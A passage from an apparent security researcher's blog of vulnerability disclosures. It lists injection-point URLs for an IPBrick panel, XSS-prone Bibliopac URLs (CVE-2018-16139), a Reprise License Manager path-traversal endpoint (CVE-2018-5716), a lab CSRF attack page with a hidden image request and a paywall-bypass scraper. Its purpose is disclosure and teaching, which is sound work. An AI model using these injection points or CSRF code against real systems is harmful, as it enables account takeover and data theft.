* /corpo.php?pagina=maquinas_inserir&f_type=1&f_nome=1&f_gidnumber=802&f_ip1=192&f_ip2=168&f_ip3=69&f_ip4=111&f_mac1=&f_mac2=&f_mac3=&f_mac4=&f_mac5=&f_mac6=*
* /corpo.php?pagina=show_log&file=*&file2=
* /corpo.php?pagina=show_log&file=system-1519780916.tgz&file2=*
* /corpo.php?pagina=manage_access_log_adv_alt&id_access=*
* /corpo.php?pagina=voip_options_alterar_altera&option=callcenter&in_estado_acd_remoto=t&in_ip_ACD=*&in_suf_ACD=&status_send_queue_log=t&extra_send_queue_log_ip=&extra_send_queue_log_port=&status_send_queue_log_share=t&extra_send_queue_log_share_ip=&extra_send_queue_log_share_folder=&extra_send_queue_log_share_login=admin&extra_send_queue_log_share_pwd=123456&extra_send_queue_log_share_period=1&extra_send_queue_log_share_hour=0&f_accao=Modify
* /corpo.php?pagina=voip_interface_pstn_inserir&nomeinterface=*&tipointerface=NT&opensippeers=0&rxgain=0&txgain=0&fqdn=&msip=&intechocancel=G
* /corpo.php?pagina=utilizador_ver_lista&offset=*&first_char=&pesq_nome=
* /corpo.php?pagina=utilizador_ver_lista&offset=*&first_char=&pesq_nome=
* /corpo.php?pagina=voip_options_alterar_altera&option=*&dnat=f&voip_public_ip_type_options=0&voip_public_ip_value1_options=&voip_listen_public_ip_type_options=0&voip_listen_public_ip_value1_options=10.0.0.253&int_voip=1&direct_rtp_setup=f&rmzero=f&contacts_server=local&cid_ldapsrv=127.0.0.1&cid_dnsdomain=domain.com&username_remote=admin&password_remote=123456&cid_search=f&cid_search_internal=f&address_restrict=f&voip_pbx_asterisk_answer=t&voip_att_timeout_options=30&voip_call_timeout_options=120&rtp_timeout=600&rtp_hold_timeout=700&agent_timeout_status=f&agent_timeout_extra=30&reg_expire_default=3600&reg_expire_max=3600&qualify_freq=60&reg_attempts=0&sip_videosupport=t&voipoptions_est_directory_users_ext=f&voipoptions_ext_directory_users_ext=*61&voipoptions_ext_directory_users_searchby=lastname&estatttransfer=f&extatttransfer=*1&estbldtransfer=f&extbldtransfer=#1&estado_pickup_ext=t&extra_pickup_ext=*8&estado_pickup_ext_grp=f&extra_pickup_ext_grp=*7&estado_pickup_ext_global=t&extra_pickup_ext_global=*8&extra_pickup_mode=1&estado_block_ext=f&extra_block_ext=*76&estado_unblock_ext_code=f&extra_unblock_ext_code=123456&estado_dnd_ena_ext=f&extra_dnd_ena_ext=*73&extra_dnd_dis_ext=*74&estado_cfw_all_ena_ext=f&extra_cfw_all_ena_ext=*70&estado_cfw_bsy_ena_ext=f&extra_cfw_bsy_ena_ext=*72&estado_cfw_noanw_ena_ext=f&extra_cfw_noanw_ena_ext=*71&estado_acfw_noanw_ena_ext=f&accao_acfw_noanw_ena_ext=0&extra_acfw_noanw_ena_ext=0&estado_retrydial_busy_ena_ext=f&extra_retrydial_busy_ena_ext=5&extra_retrydial_busy_timeout=60&extra_retrydial_busy_restrict=0&estado_barge_ext=f&extra_barge_ext=*9&estado_audio_recording_byphone=f&extra_audio_recording_byphone_seq=*60&extra_audio_recording_byphone_pinauth=&estado_callscreen_ext=f&extra_callscreen_ext=*64&moh_enable=f&id_moh=1&estado_callscreen_callerid_anonymous_ena=f&estado_callscreen_save_records=f&estado_callscreen_automatic_answer=f&prioritizacao=f&estado_recording_demand=f&estado_recording_cache=f&estado_adv_call_stats=f&conta_ftp=f&estado_voip_high_resolution_time=t&estado_dbreporting=f&extra_dbreporting=&ip_media=f&simetric_rtp=t&estado_chef_secretary=f&extra_chef_secretary=*79&forwarding_messages=t&dial_separator=#&estado_click2dial_msg=f&distinctive_ring=t&estado_password_policies=t&extra_password_policies=8&default_call_limit=2&addsipportscount=1&addsipports_0=5060&tls_port=5061&iax_port=4569&extra_udp_error_control=fec&estado_sip_tos=f&sip_tos_0=cs3&sip_tos_1=ef&sip_tos_2=af41&sip_tos_3=af41&estado_iax_tos=f&iax_tos_0=ef&estado_sip_cos=f&sip_cos_0=3&sip_cos_1=5&sip_cos_2=4&sip_cos_3=3&estado_iax_cos=f&iax_cos_0=5&extra_channel_tonezone=pt&f_accao=Modify&addsipports_=   (C'mon!! at least change this to post data!)
* /corpo.php?pagina=utilizador_ver_lista&offset=0&first_char=&pesq_nome=*
* /corpo.php?pagina=vpnssl_policies_ins&policy=*

* /manual/index.php?node=undefined&man_lang=*
* /manual/index.php?node=*&man_lang=undefined

Every input in this application should be sanitized to prevent exploitation of all these vulnerabilities and implement an antiCSRF token.

Advisory Note If you look closely, you’ll find that I skipped a lot of injection points. The reason is that I was fed up of discovering things. Sorry about that, but just choose a form and test it. There is a probability that has something wrong in it.

TimeLine

*29/08/18 - CVE Request

*30/08/2018 - Contacted IPBrick to send details

*25/10/2018 - No response from IPBrick

*06/11/2018 - Contacted CSIRT since several critical institutions were vulnerable

*14/11/2018 - Response from IPBrick stating they will analyze the incident

*03/12/2018 - Email sent, no updates on the matter

*20/01/2018 - Email sent, no updates on the matter

*26/12/2018 - Response stating that by the end of January a fix will be provided

*03/01/2019 - It’s February, disclosing it

XSS on Bibliopac (CVE-2018-16139)

Fri, 01 Feb 2019 00:00:00 +0000

Good morning. Today I bring to attention a XSS vulnerability in a library management/inventory software, Bibliopac from Bibliosoft. This software is used mainly in the Portuguese geographic region by several entities, and it’s somewhat old. The reason that this could be dangerous has to do with the environment of the vulnerability.

Quick introduction to XSS attacks

XSS vulnerabilities allow attackers to inject code (often Javascript code) into a webpage. By injecting Javascript code an attacker can try to steal authentication tokens, inject keyloggers ( XSS-Keylogger) or even try to exploit several vulnerabilities in the WebKit engine to try to achieve remote code execution (like in the PS4 and Switch case What do Nintendo Switch and iOS 9.3 have in common? CVE-2016-4657 walk-through). This type of vulnerability affects the clients itself and not the server data, at least in a direct way. Imagine if there is a back-office, and a system administrator opens the link or visits the page with the payload and get their session cookie stolen. The attacker can now impersonate the identity of the administrator and escalate privileges. The matter gets worst if, considering the environment, there is a single sign-on authentication and the attacker is able to steal those authentication tokens then it can log in in other applications that have connectors to that SSO authentication.

In my research, I found on Google 176 results of this application running on several servers. The matter gets worst when we look at what institutions are running it. Institutions related to education, city halls or even court-related institutions.

After discovering this vulnerability, I contacted the developer of this application. However, they stated that the software is deprecated and no patch will be issued. Confirming on their website, it is indeed an old software version, and a new product is available (I did not test the new product).

Despite that the vulnerability still exists and can be exploited. The following URLs are prone to XSS:

/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bin/bibliopac.xic&db=BIBLIO*&lang=P&start=
/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bin/bibliopac.xic&action=EXTRASEARCH*&search=

Keep in mind that the “db” parameter could be different since the application allow for different Databases to be installed.

If we analyze the source code, we can see the * reflected on the page. Weaponizing the vulnerability, we can trigger an alert message to prove that it works: In the second injection point we see that it capitalizes the input so we need to (for example) point to a script on another location to fully exploit it.

Concluding

An attacker can exploit this vulnerability to extract additional information from a clients website. If for any change you need to have this product exposed mitigations are needed to be placed to block this attack. There is also the possibility to have other injection points in the software, but that wasn’t thoroughly tested.

Timeline

27/08/2018 - First contact to request security contact of the company
28/08/2018 - First response
31/08/2018 - Details sent
31/08/2018 - Response (deprecated 5 years ago) won’t fix
31/08/2018 - Query to known if clients are going to be notified
22/10/2018 - No Response, contacted CSIRT
XX/12/2018 - Won’t fix, clients being informed
01/02/2019 - Disclosing it

References

OWASP-XSS

OWASP-XSS Mitigation

I do not promote the exploitation of this vulnerability for malicious purposes. My research was only an academic one without interference or harm to any people.

Path Traversal Reprise Licence Manager (CVE-2018-5716)

Fri, 16 Feb 2018 16:20:51 +0000

This post will demonstrate a vulnerability in the Reprise Licence Manager (RLM) version 11.0 found while doing a pentest. The vulnerability in question allows a user with access to the Web Management Interface to access (and sometimes write) files in the System.

This vulnerability allows to access files, and therefore gather additional info about the system, and also delete the log file of the RLM server (in case of the file write permission).

This situation was reported to the Reprise Software Inc. and was promptly considered NOT A VULNERABILITY since the application was to be installed as a non-privileged user. However I strongly disagree since an attacker can access some files that are available for all users on the system. This issue could be easily resolved by having a list of files where the application can access and limit the access to the Web Application only.

A CVE (CVE-2018-5716) was issued for this vulnerability and is going to be released soon.

Without any further ado here comes the details of it:

An attacker who can access the Web Management Interface can edit license files, license files have an arbitrary path where a person can edit. Changing the path to some other file will render it access to that file.

One interesting aspect is that you can write any extension for the file so .EXE files where an attacker could write executable files. However, the [<>&] aren’t allowed so introducing WebShells won’t be so easy.

The vector itself that this vulnerability is refering will be located on the http(s)://ipOfServer:port//goform/edit_lf_get_data. Analyzing the request with burp we can see the parameter where a full path of a file is being send:

If we change the path to some file out of the directory structure, like for example the hosts file in windows we can see the response in the Web browser where the file will be presented:

As we can see in the picture above a file outside the Web root was accessed without any control. The matter is worsen since the application accepts in the user interface any file, by direct input thus Reprise Software Inc. won’t consider this a vulnerability. However an attacker can overwrite some important files, like the application log hence hiding their tracks. A solution passes by limiting the file access to the directory structure or to a license folder, avoiding the writing of files with different extensions.

Next I present to you the form where you can input any file to be read (and then overwritten, giving the permissions):

For testing and record next is the about page where it states the product version:

On conclusion, this is my opinion only, that this behavior represents a danger since the attacker can read arbitrary data provided its stored on the disk AND we have permission to read. However a lot of information can be retrieved from files that have low permissions standards. The recommendation that the company gave me is to lower the permissions level so the application can’t read critical files, but I think that solution won’t be enough and based on the OWASP Path Transversal (OWASP Path Transversal) it is still considered a vulnerability. There is the possibility to disable the interface.

I hereby don’t incentive to exploit this vulnerability for malicious purposes and my research was only an academic one without interference or harm to any people.

CSRF and COORS the misconfiguration that will own you.

Mon, 11 Dec 2017 23:00:00 +0000

A lot of requendations about security are “don’t browse sites that you don’t know”. People can ask why is that. How visiting a website that i don’t fully trust can compromise me or other sites that I use.

Today I embarked on a quest to try to show people (and some shitty computer security firms that don’t consider this a vulnerability) why that’s absolutely wrong. Shortly I will setup an environment and perform the attack on a small lab to show you how to use it and how to defend against it. CSRF or cross-site request forgery is an attack that where a website makes an HTTP request to other site and triggers an action. This action can be, changing a password, creating a new user on the application (useful if there is an administration panel). This vulnerability appears on many security devices and the attacker can exploit them to whereas extent it wants, however some criteria are required for it to be successful: The attacker must know the complete address of the service The parameters for the call should be known, or at least, deterministic The victim should be already logged in

The first criteria could be met or by inside knowledge or OSINT (Open Source Intelligence) or scanning. A simple way is, imagine you are a pentester and you already are on the network and see a known security appliance that has a CSRF vulnerability to add users that will allow you to control, with high privileges the network perimeter. You know the appliance (Software), the version and the address, so it’s should be fairly straight forward to attack.

The second criteria comes with the first one, when you identify the software its easy to find the request that will trigger the attack. You can setup Burp to intercept the requests of the browser or you can simple use the developers tools on the main browsers (Chrome/Firefox) and navigate to the ‘Network’ Tab and inspect the traffic generated by a Web Application. By clicking on the request you can inspect all the parameters and check if there is any “csrf_token” parameter that will block our attack.

The third criteria is a bit of chance. If its a portal that we know the victim uses we will probably achieve our goal, otherwise we may not. Other techniques could be used link traffic inspection to check if its communicating with the server (if we check for the destination IP in a SSL/TLS connection).

In some environments with federal authentication (or similar) where the login is the same for all the Web applications on the same domain even if the victim didn’t login on the specific portal the session cookie still exists and can be used to access the portal nevertheless. I say can since some federal authentication services may require a confirmation before allowing the specific web application to continue.

Now with that in mind lets begin with our scenario. We have two Web sites the official site (at 192.168.155.114)and the attackers website (at 192.168.155.133). The official site is a site where a user has to login to make a transaction. For sake of brevity the official website has a predefined login with the username being “victim” and the password “pass”, by requesting the transaction a session variable is stored and saved not allowing any more submissions. Please disregard the other vulnerabilities on the site like the username and password being submitted via GET request we are not focusing on that right now. Here is the code for the official WebSite:

session_start();

if(!isset($_SESSION['logedin'])){

    if( isset($_GET["username"]) && isset( $_GET["password"])){
        if( $_GET["username"]==='victim' &&  $_GET["password"]==='pass'){
            $_SESSION['logedin']=true;

        }

    }else{
        echo '<form action="/bankpage/index.php">
	  Username:<br>
	  <input type="text" name="username"><br>
	  Last name:<br>
		  <input type="password" name="password">
	<input type="submit">
		</form>
			';
    }
}

if (isset($_SESSION['logedin']) && $_SESSION['logedin']==true)
{
    if(isset($_SESSION['transactions'])){
        echo 'Transaction
		<br>';
        echo $_SESSION['transactions'];

    }else{
        if(isset($_GET['transaction_number'])){
            $_SESSION['transactions']='Transaction Made='.$_GET['transaction_number'];
            header("Refresh:0");
        }

        else{
            echo 'No transactions have been made';


            //Make transaction
            echo '
	<form action="/bankpage/index.php">
	<input type="text" name="transaction_number" />
	<input type="Submit" value="Submit" />
	</form>
	';
        }

    }
}
#DONT FORGET THE PHP TAGS!

The attackers website is the one that, once visited, makes the cross site request and triggers the transaction. It’s just simple as that, just visit the website and before you know it, the attack has already been done. And here is the code for the attackers site:

<body>
<h1> ATACCKERS </h1>

<img src="http://192.168.155.114/bankpage/index.php?transaction_number=1337" width="0" height="0" border="0">
</body>

The attack procedes as follows, the victim accesses the website and logins in it.

As we see in the next image, there are no transaction done.

By visiting the attacker website and triggering the attack we go back then to the official site and see a transaction that we haven’t done knowingly.

When we refresh the official page we now see the transaction that has been made.

Now for the fun part. There are a lot of ways to do this easily. The first one is by creating and img tag and point the source for the address to attack. If we need a POST request we can create a form with it and when the page is loaded it triggers the event and submit the form. One thing that you should have in mind is that browsers nowadays are more “intelligent” than a few years back and when submitting and AJAX request it will be blocked. The reason for this is CORS (Cross Origin Resource Sharing). This HTTP header tries to block requests to other sites that don-t specially specifies the origin host. Some sites provide an external API where the website makes requests to and that API should implement CORS for modern browsers to work. This isn’t valid for some HTML tags since almost everyone uses, for images at least, external resources.

To detect this attack on you website you could simple check for external HTTP Referer on the logs for your API. If a website that you know is used for this attack or suspect its being used it will show as a different Referer.

To fully mitigate this issue we should employ CSRF_TOKEN verification in all forms that will trigger some action in the database. Solutions build in django, for instance, already required to add the token by default in every form, for Apache lovers we can use mod_csrf (mod_csrf) or in code (PHP_CSRF_GUARD). Ultimately the web developer should use this by default while developing the Web Application. Since the attacker can’t have the token easely he can’t submit the form.

References: OWASP CSRF

Happy New Year for everyone!

How to not implement Security - A tale of Hidden Text

Sun, 09 Jul 2017 23:00:00 +0000

Finnaly with some time to write. This time I want to point out a very usual mistake done in Web Applications programming wich is hidding content with JavaScript. Time and time again I see this “Mistake”, on Universities, Shopping sites and on web newspappers.

Recently I was browsing a news site and suddenly I couldn’t load the whole story since I was using an ad-blocker and since I didn’t pay for a subscription (Obviously). Altough it was a very interesting story and I really wanted to read.

And after the limit is reached we are presented with this:

The very first thing that I saw was a subtle fade-out of the text on the story and I started wondering were the hell the text went. Of course, being me the very next thing is to see the source-code and, surprise surprise. There was the rest of the story. Not in a so friendly view but I could finish reading it.

I then check other stories and the same thing happend, the story will be loaded but it will be hidden. Python to the rescue then! I created a litle script that recieves the URL of the story and clean everything to present with the raw text of the story. I could obviously create a document with all the images and stuff but, normally, the images appear on the header of the page and are not hidden (Some exceptions apply).

import urllib2,re,sys
from bs4 import BeautifulSoup

#This script will show, in a more user-friendly way, the hidden news in the publico.pt website

#Check for news link

if len(sys.argv) != 2:
    print "No News Portal was passed"
    sys.exit(1)

#Execute the request

req = urllib2.Request(sys.argv[1])
response = urllib2.urlopen(req)
noticia = response.read()

#Parse the data to be more user-friendly

soup = BeautifulSoup(noticia,'html.parser')
story = soup.find(id="story-body")

for entry in story.find_all('p'):
    prep = str(entry)
    stripExtra = re.sub(r"<[a-zA-Z/]*>",r"",prep)
    print stripExtra

sys.exit(0)

To summarize, if you are building a web portal. Check permissions first hand and don’t just hide information. A simple mitigation for this issue is to, when clicking on the button to read the whole story an AJAX request is made to the server where is going to check the login information. This will help the changes not be so abrupt to the application. Also, this is just an example of what could happen I don’t endorse this method and if you really want to read some the news on this or another paid website, you should contribuite to that newspapper so they can keep doing their good job.